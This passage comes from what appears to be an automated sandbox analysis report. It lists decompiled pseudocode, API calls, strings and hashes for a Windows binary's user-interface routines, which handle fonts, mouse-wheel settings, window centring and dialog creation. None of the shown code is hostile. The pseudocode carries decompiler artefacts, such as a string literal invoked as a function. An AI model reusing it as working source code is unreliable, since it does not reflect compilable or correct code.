					 *(_t70 - 0x60) = _t42 -  *0x439c9c;
					if(GetSystemMetrics(0x2a) == 0) {
						_push("Small Fonts");
					} else {
						_push("Terminal");
					}
					lstrcpyA(_t70 - 0x44, ??);
					if(E0041A6E1(0xf233, _t70 - 0x60) == 0) {
						 *((char*)(_t70 - 0x45)) = 0x20;
					}
					_t50 = CreateFontIndirectA(_t70 - 0x60);
					_t82 = _t50;
					 *0x439ca0 = _t50;
					if(_t50 == 0) {
						L20:
						_t28 = E00425FC6(0xa);
						goto L21;
					} else {
						goto L11;
					}
				}
			}

APIs

__EH_prolog.LIBCMT ref: 00422A1E

Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
Part of subcall function 00425F56: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
Part of subcall function 00425F56: LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE

LoadBitmapA.USER32 ref: 00422A55
GetObjectA.GDI32(00000000,00000018,?), ref: 00422A67
GetSystemMetrics.USER32 ref: 00422AB1
lstrcpyA.KERNEL32(?,Small Fonts,?,0000000A), ref: 00422ACB
CreateFontIndirectA.GDI32(?), ref: 00422AEB
SelectObject.GDI32(?,00000000), ref: 00422B1B
GetTextMetricsA.GDI32(?,?), ref: 00422B2D
SelectObject.GDI32(?,00000000), ref: 00422B3E

Strings

, xrefs: 00422AE3
Small Fonts, xrefs: 00422AC2
Terminal, xrefs: 00422ABB

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CriticalSection$Object$EnterMetricsSelect$BitmapCreateFontH_prologIndirectInitializeLeaveLoadSystemTextlstrcpy
String ID: $Small Fonts$Terminal
API String ID: 1234877182-3042510724
Opcode ID: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
Instruction ID: af1173b3a4b80694a70ec61d8b55af463f2ab6573842c533f6f97c7bdcca2de6
Opcode Fuzzy Hash: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
Instruction Fuzzy Hash: 72417171B00219AFDB20DFA5ED85AAE7BB5FB04344F94013AE505E6191DBB85D01CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABA7, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 80
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041ABA7() {
				void* _v8;
				int _v12;
				int _v16;
				char _v144;
				void _t9;
				struct HWND__* _t20;
				void _t21;
				int _t22;
				int _t23;
				int _t27;
				short _t28;
				intOrPtr _t30;

				_t27 =  *0x437cdc; // 0x0
				if(_t27 != 0) {
					L16:
					_t9 =  *0x439c90; // 0x0
					return _t9;
				}
				_t28 =  *0x439c8c; // 0x0
				 *0x437cdc = 1;
				if(_t28 != 0) {
					L10:
					__eflags =  *0x439c8c - 2;
					if( *0x439c8c != 2) {
						L4:
						_t30 =  *0x439c3c; // 0x1
						 *0x439c90 = 3;
						if(_t30 != 0) {
							__eflags =  *0x439c38; // 0x0
							if(__eflags == 0) {
								SystemParametersInfoA(0x68, 0, 0x439c90, 0);
							}
						} else {
							if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop", 0, 1,  &_v8) == 0) {
								_v12 = 0x80;
								if(RegQueryValueExA(_v8, "WheelScrollLines", 0,  &_v16,  &_v144,  &_v12) == 0) {
									 *0x439c90 = E0040718F( &_v144, 0, 0xa);
								}
								RegCloseKey(_v8);
							}
						}
						goto L16;
					}
					_t20 = FindWindowA("MouseZ", "Magellan MSWHEEL");
					__eflags = _t20;
					if(_t20 == 0) {
						goto L4;
					}
					_t23 =  *0x439c88; // 0x0
					__eflags = _t23;
					if(_t23 == 0) {
						goto L4;
					}
					_t21 = SendMessageA(_t20, _t23, 0, 0);
					 *0x439c90 = _t21;
					return _t21;
				}
				_t22 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
				 *0x439c88 = _t22;
				if(_t22 != 0) {
					 *0x439c8c = 2;
					goto L10;
				} else {
					 *0x439c8c = 1;
					goto L4;
				}
			}

APIs

RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG), ref: 0041ABDB
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop,00000000,00000001,?), ref: 0041AC1E
RegQueryValueExA.ADVAPI32(?,WheelScrollLines,00000000,?,?,?), ref: 0041AC4B
RegCloseKey.ADVAPI32(?), ref: 0041AC6F
FindWindowA.USER32 ref: 0041AC98
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0041ACB8
SystemParametersInfoA.USER32(00000068,00000000,00439C90,00000000), ref: 0041ACD6

Strings

MouseZ, xrefs: 0041AC93
WheelScrollLines, xrefs: 0041AC43
Control Panel\Desktop, xrefs: 0041AC14
MSH_SCROLL_LINES_MSG, xrefs: 0041ABD6
Magellan MSWHEEL, xrefs: 0041AC8E

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MessageWindow$CloseFindInfoOpenParametersQueryRegisterSendSystemValue
String ID: Control Panel\Desktop$MSH_SCROLL_LINES_MSG$Magellan MSWHEEL$MouseZ$WheelScrollLines
API String ID: 1228133072-821443377
Opcode ID: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
Instruction ID: 5c83e38d2889ea35cb43268cbe58cad34713885164d32870b4297f9966653a84
Opcode Fuzzy Hash: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
Instruction Fuzzy Hash: B0216F70A45214ABDB309B51EC49AEB3BB8FB00744F506026E405D2260EBB85DD5DFDE

Uniqueness

Uniqueness Score: -1.00%

Function 00421F4E, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 73
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00421F4E(void* __ecx, CHAR* _a4) {
				char _v520;
				intOrPtr _t36;
				intOrPtr _t45;
				void* _t55;
				void* _t56;

				_t55 = __ecx;
				if((E00416528(__ecx) & 0x00000040) == 0) {
					lstrcpyA( &_v520,  *(__ecx + 0xac));
					if(_a4 != 0) {
						lstrcatA( &_v520, " - ");
						lstrcatA( &_v520, _a4);
						_t36 =  *((intOrPtr*)(_t55 + 0x40));
						if(_t36 > 0) {
							_push(_t36);
							wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
						}
					}
					L9:
					return E0041A843( *((intOrPtr*)(_t55 + 0x1c)),  &_v520);
				}
				_v520 = _v520 & 0x00000000;
				if(_a4 == 0) {
					L5:
					lstrcatA( &_v520,  *(_t55 + 0xac));
					goto L9;
				}
				lstrcpyA( &_v520, _a4);
				_t45 =  *((intOrPtr*)(_t55 + 0x40));
				if(_t45 > 0) {
					_push(_t45);
					wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
				}
				lstrcatA( &_v520, " - ");
				goto L5;
			}

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

lstrcpyA.KERNEL32(00000000,00000000), ref: 00421F82
lstrlenA.KERNEL32(00000000,:%d,?), ref: 00421F9C
wsprintfA.USER32 ref: 00421FAA
lstrcatA.KERNEL32(00000000, - ), ref: 00421FBF
lstrcatA.KERNEL32(00000000,?), ref: 00421FCE
lstrcpyA.KERNEL32(?,?), ref: 00421FDF
lstrcatA.KERNEL32(?, - ), ref: 00421FFD
lstrcatA.KERNEL32(?,00000000), ref: 00422009
lstrlenA.KERNEL32(?,:%d,?), ref: 0042201F
wsprintfA.USER32 ref: 0042202D

Strings

:%d, xrefs: 00421F96, 00422019
- , xrefs: 00421FB9, 00421FF7

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: lstrcat$lstrcpylstrlenwsprintf$LongWindow
String ID: - $:%d
API String ID: 3078587954-2359489159
Opcode ID: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
Instruction ID: ae4adf689d7d90f23104f1149d1543740a665fba2c23219458a983a253b49f06
Opcode Fuzzy Hash: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
Instruction Fuzzy Hash: 5A2123B1A0031EEBCB20ABA5ED4DF8A77ACEF40344F5044A6E615D2151D778E645CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00415B0F, Relevance: 19.7, APIs: 13, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00415B0F(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E00416528(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E00404F6B(E00404F00(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E00404DAE();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E00404F6B(E00404F00(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E0041663D(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetParent.USER32(?), ref: 00415B3A
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00415B5D
GetWindowRect.USER32 ref: 00415B76
GetWindowLongA.USER32 ref: 00415B89
CopyRect.USER32 ref: 00415BD6
CopyRect.USER32 ref: 00415BE0
GetWindowRect.USER32 ref: 00415BE9
CopyRect.USER32 ref: 00415C05

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
Instruction ID: 84b52a2fdf36364977305fff30e360f87450067914530d6a9d7fdd5b83c17d5a
Opcode Fuzzy Hash: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
Instruction Fuzzy Hash: A4517571A04619AFCB10DFA8DC85EEEBBB9AF84314F154125E501F3291D734B9468B98

Uniqueness

Uniqueness Score: -1.00%

Function 00428D7F, Relevance: 19.6, APIs: 13, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00428D7F(intOrPtr* __ecx) {
				struct tagSIZE _v12;
				int _v16;
				struct tagSIZE _v24;
				void* _v28;
				int _v32;
				struct tagLOGFONTA _v92;
				struct tagTEXTMETRICA _v148;
				void* _t64;
				long _t70;
				void* _t79;
				signed int _t83;
				signed int _t84;
				void* _t91;
				int _t117;
				void* _t119;
				void** _t122;

				_t121 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t64 =  *(__ecx + 0x2c);
					if(_t64 == 0) {
						_push(0xe);
						return  *((intOrPtr*)( *__ecx + 0x24))();
					}
					if( *((intOrPtr*)(__ecx + 4)) != 0) {
						GetObjectA(_t64, 0x3c,  &_v92);
						GetTextFaceA( *(__ecx + 8), 0x20,  &(_v92.lfFaceName));
						GetTextMetricsA( *(__ecx + 8),  &_v148);
						_t70 = _v148.tmHeight;
						if(_t70 >= 0) {
							_v92.lfHeight = _v148.tmInternalLeading - _t70;
						} else {
							_v92.lfHeight = _t70;
						}
						_v92.lfWidth = _v148.tmAveCharWidth;
						_v92.lfWeight = _v148.tmWeight;
						_v92.lfItalic = _v148.tmItalic;
						_v92.lfUnderline = _v148.tmUnderlined;
						_v92.lfStrikeOut = _v148.tmStruckOut;
						_v92.lfCharSet = _v148.tmCharSet;
						_v92.lfPitchAndFamily = _v148.tmPitchAndFamily;
						_t79 = CreateFontIndirectA( &_v92);
						_v28 = _t79;
						SelectObject( *(_t121 + 4), _t79);
						GetTextMetricsA( *(_t121 + 4),  &_v148);
						_t83 = _v148.tmHeight;
						_t117 =  ~(_v92.lfHeight);
						if(_t83 >= 0) {
							_t84 = _t83 - _v148.tmInternalLeading;
						} else {
							_t84 =  ~_t83;
						}
						_v16 = _t84;
						GetWindowExtEx( *(_t121 + 4),  &_v12);
						GetViewportExtEx( *(_t121 + 4),  &_v24);
						if(_v12.cy < 0) {
							_v12.cy =  ~(_v12.cy);
						}
						if(_v24.cy < 0) {
							_v24.cy =  ~(_v24.cy);
						}
						_v32 = MulDiv(_t117, _v24.cy, _v12.cy);
						if(_v32 >= MulDiv(_v16, _v24.cy, _v12.cy)) {
							_t119 = _v28;
						} else {
							_v92.lfFaceName = _v92.lfFaceName & 0x00000000;
							_v92.lfPitchAndFamily = (_v92.lfPitchAndFamily & 0 | (_v92.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
							_t119 = CreateFontIndirectA( &_v92);
							SelectObject( *(_t121 + 4), _t119);
							DeleteObject(_v28);
						}
						_t122 = _t121 + 0x28;
						_t91 = E0041A89B(_t122);
						 *_t122 = _t119;
						return _t91;
					}
				}
				return _t64;
			}

APIs

GetObjectA.GDI32(?,0000003C,?), ref: 00428DBB
GetTextFaceA.GDI32(00000000,00000020,?), ref: 00428DCA
GetTextMetricsA.GDI32(00000000,?), ref: 00428DE0
CreateFontIndirectA.GDI32(?), ref: 00428E30
SelectObject.GDI32(00000000,00000000), ref: 00428E39
GetTextMetricsA.GDI32(00000000,?), ref: 00428E49
GetWindowExtEx.GDI32(00000000,00000000), ref: 00428E6E
GetViewportExtEx.GDI32(00000000,?), ref: 00428E7B
MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EAA
MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EB8
CreateFontIndirectA.GDI32(?), ref: 00428ED8

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Text$CreateFontIndirectMetricsObject$FaceSelectViewportWindow
String ID:
API String ID: 3870699365-0
Opcode ID: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
Instruction ID: d30efaf7af162c4076970c06207e774494d4aa7f708cde8adb03360c61ae062c
Opcode Fuzzy Hash: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
Instruction Fuzzy Hash: 15518531A01299EFCF21CFE8DD44AEEBBB9EF18300F14446AE455A7221D734AA46DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00422E02, Relevance: 18.3, APIs: 12, Instructions: 288
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00422E02(intOrPtr __ecx, struct tagPOINT _a4, intOrPtr _a8) {
				signed char _v6;
				signed int _v7;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v112;
				intOrPtr _t141;
				void* _t144;
				intOrPtr _t145;
				intOrPtr _t148;
				void* _t150;
				signed int _t151;
				void* _t161;
				int _t177;
				void* _t184;
				signed int _t188;
				void* _t190;
				signed int _t194;
				void* _t196;
				void* _t198;
				signed int _t205;
				int _t206;
				void* _t219;
				intOrPtr _t238;
				intOrPtr _t241;
				int _t243;
				signed int _t245;
				signed int _t246;
				int _t251;

				_t241 = __ecx;
				_v16 = __ecx;
				_v8 = E00416528(__ecx);
				GetWindowRect( *(__ecx + 0x1c),  &_v44);
				_t205 = GetSystemMetrics(0x21);
				_v12 = _t205;
				_v28 = GetSystemMetrics(0x20);
				if( *0x439c44 != 0) {
					_t177 = E004136A7(_t241);
					_t251 = _t177;
					_t243 = 2;
					if( *0x439c3c == 0 || (_v7 & 0x00000010) == 0) {
						L6:
						if(_t251 < 0xa || _t251 > 0x11) {
							if(_t251 != 4) {
								goto L17;
							}
							goto L9;
						} else {
							L9:
							if((_v7 & 0x00000008) == 0) {
								InflateRect( &_v44,  ~_v28,  ~_t205);
								if((_v7 & 0x00000002) == 0) {
									L17:
									return _t251;
								}
								_t184 = _t251 - 4;
								if(_t184 == 0) {
									L22:
									_t188 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000004;
									L23:
									return _t188 + 0xb;
								}
								_t190 = _t184 - 9;
								if(_t190 == 0) {
									_t194 = (0 | _a8 - _v44.top >= 0x00000000) - 0x00000001 & _t243;
									L19:
									return _t194 + 0xa;
								}
								_t196 = _t190 - 1;
								if(_t196 == 0) {
									_t188 = 0 | _a8 - _v44.top < 0x00000000;
									goto L23;
								}
								_t198 = _t196 - _t243;
								if(_t198 == 0) {
									_t194 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000005;
									goto L19;
								}
								if(_t198 == 1) {
									goto L22;
								}
								goto L17;
							}
							return _t243;
						}
					} else {
						if(_t251 == 3) {
							_t251 = _t243;
						}
						if(GetKeyState(_t243) < 0) {
							L25:
							return 0;
						} else {
							goto L6;
						}
					}
				}
				_push(_a8);
				if(PtInRect( &_v44, _a4.x) == 0) {
					goto L25;
				}
				_t206 = GetSystemMetrics(6);
				_v20 = _t206;
				_t245 = GetSystemMetrics(5);
				_v112.top = _v44.top;
				_v112.left = _v44.left;
				_v112.bottom = _v44.bottom;
				_v112.right = _v44.right;
				_push( &_v112);
				E00422D9C(0);
				CopyRect( &_v60,  &_v112);
				_push(_a8);
				if(PtInRect( &_v60, _a4.x) != 0) {
					_push(1);
					L61:
					_pop(_t144);
					return _t144;
				}
				if((_v8 & 0x00040600) == 0) {
					L56:
					_t141 =  *0x439c9c; // 0x0
					_push(_a8);
					_v44.bottom = _t206 + _t141 + _v44.top;
					if(PtInRect( &_v44, _a4.x) == 0) {
						_push(0xfffffffe);
						goto L61;
					}
					_t145 =  *0x439c98; // 0x0
					if(_a4.x >= _t145 + _v44.left - 2 || (_v6 & 0x00000008) == 0) {
						L54:
						_push(2);
					} else {
						_push(3);
					}
					goto L61;
				}
				_t246 = _v12;
				_t148 =  *0x439c98; // 0x0
				_t150 = _t148 - _t245 + _t245 * 2 + _v28;
				_t219 = _t246 - _t206 + _t206 +  *0x439c9c;
				if(_a8 >= _v44.top + _t246) {
					_t238 = _v44.bottom;
					if(_a8 < _t238 - _t246) {
						_t151 = _v28;
						if(_a4.x >= _v44.left + _t151) {
							if(_a4.x < _v44.right - _t151) {
								InflateRect( &_v44,  ~_t151,  ~_v12);
								_t206 = _v20;
								goto L56;
							}
							if((_v7 & 0x00000002) == 0) {
								if(_a8 > _v44.top + _t219) {
									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xb;
								} else {
									_push(0xe);
									goto L51;
								}
							} else {
								_push(0xb);
								goto L51;
							}
						} else {
							if((_v7 & 0x00000002) == 0) {
								if(_a8 <= _v44.top + _t219) {
									goto L33;
								} else {
									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xa;
								}
							} else {
								_push(0xa);
								goto L51;
							}
						}
					} else {
						if((_v7 & 0x00000002) == 0) {
							if(_a4.x > _v44.left + _t150) {
								_t161 = ((0 | _a4.x - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xf;
							} else {
								_push(0x10);
								goto L51;
							}
						} else {
							_push(0xf);
							goto L51;
						}
					}
				} else {
					if((_v7 & 0x00000002) == 0) {
						if(_a4.x > _v44.left + _t150) {
							_t161 = ((0 | _a4 - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xc;
						} else {
							L33:
							_push(0xd);
							goto L51;
						}
					} else {
						_push(0xc);
						L51:
						_pop(_t161);
					}
				}
				if((_v7 & 0x00000008) != 0) {
					goto L54;
				}
				return _t161;
			}

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetWindowRect.USER32 ref: 00422E1F
GetSystemMetrics.USER32 ref: 00422E2D
GetSystemMetrics.USER32 ref: 00422E36
GetKeyState.USER32(00000002), ref: 00422E6B
InflateRect.USER32(?,?,00000000), ref: 00422EA3
PtInRect.USER32(?,?,?), ref: 00422F27

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$MetricsSystemWindow$InflateLongState
String ID:
API String ID: 90034188-0
Opcode ID: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
Instruction ID: 3d4fded11727fa72cddd390d452a0739f578755c9cf4983628836b576b503de4
Opcode Fuzzy Hash: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
Instruction Fuzzy Hash: F4A1D931B00229ABDF14CFA8D945BEE77B1EF08355F55802BE902E7244D7BC9A81DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00411E32, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00411E32(intOrPtr* __ecx) {
				intOrPtr _t81;
				intOrPtr _t90;
				struct HWND__* _t91;
				intOrPtr* _t142;
				intOrPtr* _t145;
				void* _t147;
				void* _t149;

				_t118 = __ecx;
				E00406520(E00429CDC, _t147);
				_t145 = __ecx;
				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x34;
				 *((intOrPtr*)(_t147 - 0x24)) = __ecx;
				if( *(_t147 + 0x10) == 0) {
					 *(_t147 + 0x10) =  *(E00424BFB() + 8);
				}
				_t142 =  *((intOrPtr*)(E00424BFB() + 0x1038));
				 *((intOrPtr*)(_t147 - 0x28)) = _t142;
				 *(_t147 - 0x14) = 0;
				 *(_t147 - 0x18) = 0;
				 *(_t147 - 4) = 0;
				E0041615D(_t118, 0x10);
				E0041615D(_t118, 0x3c000);
				if(_t142 == 0) {
					L5:
					if( *(_t147 + 8) == 0) {
						L31:
						L33:
						 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
						return 0;
					}
					_t81 =  *0x436980; // 0x436994
					 *((intOrPtr*)(_t147 - 0x1c)) = _t81;
					 *(_t147 - 4) = 1;
					 *((intOrPtr*)(_t147 - 0x20)) = 0;
					if((0 | E00416F5E( *(_t147 + 8), _t147 - 0x1c, _t147 - 0x20) == 0x00000000) != 0) {
						L13:
						E00416DAD(_t147 - 0x40,  *(_t147 + 8));
						 *(_t147 - 4) = 2;
						E004170E7(_t147 - 0x40,  *((intOrPtr*)(_t147 - 0x20)));
						 *(_t147 - 0x14) = E00416E4A(_t147 - 0x40);
						 *(_t147 - 4) = 1;
						E00416E3C(_t147 - 0x40);
						if( *(_t147 - 0x14) != 0) {
							 *(_t147 + 8) = GlobalLock( *(_t147 - 0x14));
						}
						L15:
						 *(_t145 + 0x2c) =  *(_t145 + 0x2c) | 0xffffffff;
						 *(_t145 + 0x24) =  *(_t145 + 0x24) | 0x00000010;
						_push(_t145);
						"VWh\rDB"();
						_t90 =  *((intOrPtr*)(_t147 + 0xc));
						if(_t90 != 0) {
							_t91 =  *(_t90 + 0x1c);
						} else {
							_t91 = 0;
						}
						 *(_t147 - 0x18) = CreateDialogIndirectParamA( *(_t147 + 0x10),  *(_t147 + 8), _t91, E00411B77, 0);
						 *(_t147 - 4) = 0;
						E00416AEC(_t147 - 0x1c);
						 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
						if(_t142 != 0) {
							 *((intOrPtr*)( *_t142 + 0x14))(_t147 - 0x34);
							if( *(_t147 - 0x18) != 0) {
								 *((intOrPtr*)( *_t145 + 0xb4))(0);
							}
						}
						if(E00413C3E() == 0) {
							 *((intOrPtr*)( *_t145 + 0xa4))();
						}
						if( *(_t147 - 0x18) != 0 && ( *(_t145 + 0x24) & 0x00000010) == 0) {
							DestroyWindow( *(_t147 - 0x18));
							 *(_t147 - 0x18) = 0;
						}
						if( *(_t147 - 0x14) != 0) {
							GlobalUnlock( *(_t147 - 0x14));
							GlobalFree( *(_t147 - 0x14));
						}
						if( *(_t147 - 0x18) != 0 || ( *(_t145 + 0x24) & 0x00000010) == 0) {
							_push(1);
							_pop(0);
							goto L33;
						} else {
							goto L31;
						}
					}
